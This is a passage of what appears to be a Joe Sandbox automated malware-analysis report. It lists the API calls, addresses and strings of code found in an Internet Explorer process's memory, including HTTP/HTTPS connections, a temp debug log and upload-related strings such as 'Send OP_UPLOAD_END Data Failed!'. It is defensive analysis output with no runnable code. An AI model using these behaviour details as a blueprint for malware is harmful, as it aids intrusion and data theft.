      • Part of subcall function 00517FBE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
      • Part of subcall function 00517FBE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
      • Part of subcall function 00517FBE: CloseHandle.KERNEL32(00000000), ref: 0051811E
    Strings
    • Send OP_UPLOAD_END Data Failed!, xrefs: 00515CCA
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
    • _errno.MSVCRT ref: 0051A956
      • Part of subcall function 0051A441: OutputDebugStringA.KERNEL32(Invalid parameter passed to C runtime function.), ref: 0051A42F
    • _errno.MSVCRT ref: 0051A9AD
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
    • _errno.MSVCRT ref: 004F334F
      • Part of subcall function 004F3287: OutputDebugStringA.KERNEL32(Invalid parameter passed to C runtime function.), ref: 004F3275
    • _errno.MSVCRT ref: 004F3396
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773005659.004F0000.00000040.sdmp, Offset: 004F0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_4f0000_iexplore.jbxd
    APIs
    • _errno.MSVCRT ref: 0051A741
      • Part of subcall function 0051A441: OutputDebugStringA.KERNEL32(Invalid parameter passed to C runtime function.), ref: 0051A42F
    • _errno.MSVCRT ref: 0051A788
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
    • _errno.MSVCRT ref: 0051A7B5
      • Part of subcall function 0051A441: OutputDebugStringA.KERNEL32(Invalid parameter passed to C runtime function.), ref: 0051A42F
    • _errno.MSVCRT ref: 0051A7F0
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
      • Part of subcall function 00517FBE: memset.MSVCRT ref: 00518001
      • Part of subcall function 00517FBE: GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
      • Part of subcall function 00517FBE: ___swprintf_l.LIBCMT ref: 00518058
      • Part of subcall function 00517FBE: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
      • Part of subcall function 00517FBE: GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
      • Part of subcall function 00517FBE: SetEndOfFile.KERNEL32(00000000), ref: 005180CC
      • Part of subcall function 00517FBE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
      • Part of subcall function 00517FBE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
      • Part of subcall function 00517FBE: CloseHandle.KERNEL32(00000000), ref: 0051811E
      • Part of subcall function 005114F8: memset.MSVCRT ref: 0051154A
      • Part of subcall function 005114F8: memset.MSVCRT ref: 00511561
      • Part of subcall function 005114F8: memset.MSVCRT ref: 00511578
      • Part of subcall function 005114F8: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000001), ref: 0051158C
      • Part of subcall function 005114F8: ___swprintf_l.LIBCMT ref: 005115E4
      • Part of subcall function 005114F8: GetPrivateProfileStringW.KERNEL32(?,Path,00000000,?,00000104,?), ref: 00511605
    • WinHttpOpen.WINHTTP(00000000,00000003,?,00000000,00000000,?,HTTP,?,?,?,00513F99,00000000,?,00000000,?,00000000), ref: 005121C9
      • Part of subcall function 005121E5: memset.MSVCRT ref: 00512208
      • Part of subcall function 005121E5: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000020,?,00000020,?,?,00000000), ref: 0051221B
      • Part of subcall function 005121E5: wcsstr.MSVCRT ref: 0051222A
      • Part of subcall function 005121E5: _wtoi.MSVCRT ref: 0051223B
      • Part of subcall function 005121E5: WinHttpConnect.WINHTTP(?,?,00000050,00000000,?,?,00000000), ref: 00512277
      • Part of subcall function 005121E5: GetLastError.KERNEL32(?,?,00000000), ref: 00512284
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
      • Part of subcall function 00517FBE: memset.MSVCRT ref: 00518001
      • Part of subcall function 00517FBE: GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
      • Part of subcall function 00517FBE: ___swprintf_l.LIBCMT ref: 00518058
      • Part of subcall function 00517FBE: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
      • Part of subcall function 00517FBE: GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
      • Part of subcall function 00517FBE: SetEndOfFile.KERNEL32(00000000), ref: 005180CC
      • Part of subcall function 00517FBE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
      • Part of subcall function 00517FBE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
      • Part of subcall function 00517FBE: CloseHandle.KERNEL32(00000000), ref: 0051811E
      • Part of subcall function 005114F8: memset.MSVCRT ref: 0051154A
      • Part of subcall function 005114F8: memset.MSVCRT ref: 00511561
      • Part of subcall function 005114F8: memset.MSVCRT ref: 00511578
      • Part of subcall function 005114F8: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000001), ref: 0051158C
      • Part of subcall function 005114F8: ___swprintf_l.LIBCMT ref: 005115E4
      • Part of subcall function 005114F8: GetPrivateProfileStringW.KERNEL32(?,Path,00000000,?,00000104,?), ref: 00511605
    • WinHttpOpen.WINHTTP(00000000,00000003,?,00000000,00000000,?,HTTPS,?,?,?,00513DA1,00000000,?,00000000,?,00000000), ref: 0051215A
      • Part of subcall function 005121E5: memset.MSVCRT ref: 00512208
      • Part of subcall function 005121E5: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000020,?,00000020,?,?,00000000), ref: 0051221B
      • Part of subcall function 005121E5: wcsstr.MSVCRT ref: 0051222A
      • Part of subcall function 005121E5: _wtoi.MSVCRT ref: 0051223B
      • Part of subcall function 005121E5: WinHttpConnect.WINHTTP(?,?,00000050,00000000,?,?,00000000), ref: 00512277
      • Part of subcall function 005121E5: GetLastError.KERNEL32(?,?,00000000), ref: 00512284
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
    • _errno.MSVCRT ref: 0051A8CF
      • Part of subcall function 0051A441: OutputDebugStringA.KERNEL32(Invalid parameter passed to C runtime function.), ref: 0051A42F
      • Part of subcall function 0051CEF9: _errno.MSVCRT ref: 0051CF1C
    • _errno.MSVCRT ref: 0051A914
    Strings
    • abcdefghijklmnopqrstuvwxyz, xrefs: 0051A8C0
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
      • Part of subcall function 00517FBE: memset.MSVCRT ref: 00518001
      • Part of subcall function 00517FBE: GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
      • Part of subcall function 00517FBE: ___swprintf_l.LIBCMT ref: 00518058
      • Part of subcall function 00517FBE: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
      • Part of subcall function 00517FBE: GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
      • Part of subcall function 00517FBE: SetEndOfFile.KERNEL32(00000000), ref: 005180CC
      • Part of subcall function 00517FBE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
      • Part of subcall function 00517FBE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
      • Part of subcall function 00517FBE: CloseHandle.KERNEL32(00000000), ref: 0051811E
    • WinHttpOpen.WINHTTP(00000000,00000000,00000000,00000000,00000000,00000001,?,00513CC2,00000000,00000000,?), ref: 00511BA8
      • Part of subcall function 005121E5: memset.MSVCRT ref: 00512208
      • Part of subcall function 005121E5: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000020,?,00000020,?,?,00000000), ref: 0051221B
      • Part of subcall function 005121E5: wcsstr.MSVCRT ref: 0051222A
      • Part of subcall function 005121E5: _wtoi.MSVCRT ref: 0051223B
      • Part of subcall function 005121E5: WinHttpConnect.WINHTTP(?,?,00000050,00000000,?,?,00000000), ref: 00512277
      • Part of subcall function 005121E5: GetLastError.KERNEL32(?,?,00000000), ref: 00512284
    Strings
    • Try Https by default proxy., xrefs: 00511B94
    • OpenHttpsByDefaultProxy WinHttpOpen Failed!, xrefs: 00511BB4
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd